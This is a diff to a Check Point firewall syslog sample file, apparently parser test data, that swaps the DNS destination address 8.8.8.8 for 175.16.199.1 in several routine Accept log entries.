 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41787"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43548"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43220"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -3418,22 +3418,22 @@
 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"35.165.110.9"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60568"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54892"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10147"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:57:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:57:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e182,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51468"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:57:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e182,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51468"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:57:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e182,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54898"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10148"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:57:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e196,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504662"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57050"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:57:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e196,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504662"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57050"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:57:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e196,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40004"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e197,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45128"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e197,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45128"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e197,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33577"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e197,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54904"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10149"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e197,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.224.227.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46650"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:57:56Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1a6,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T17:57:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1a6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:58:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1a8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48916"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42997"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42997"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:58:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1bb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.10.174.113"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46970"; service:"443"; service_id:"https"; src:"192.168.2.2"]
